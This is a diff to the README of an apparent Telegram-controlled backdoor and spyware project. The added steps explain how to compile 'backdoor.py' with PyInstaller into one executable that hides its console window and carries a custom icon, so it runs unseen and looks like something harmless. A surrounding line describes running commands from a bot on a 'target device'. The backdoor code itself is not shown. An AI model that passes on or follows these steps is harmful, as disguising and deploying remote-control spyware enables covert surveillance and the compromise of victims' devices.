Illusivehacks/telegram-controlled-backdoor-spyware/README.md

 All the commands to use will be displayed and now you can execute each one of them from your bot to the target device.

+10. Now after verifying that it working you can navigate to the terminal and convert the backdoor.py to an executable using the command below: step 1. ````pip install pyinstaller```` step 2.
+Create the Executable
+            Use the following command to convert your Python script (script.py) into an executable with no console and a custom icon:

+            bash
+            pyinstaller --noconsole --onefile --icon=path_to_icon.ico script.py

+    Explanation of the flags:

+   --noconsole: Hides the console window when running the executable.
+   --onefile: Packages everything into a single .exe file.
+   --icon=path_to_icon.ico: Specifies the custom icon for the executable.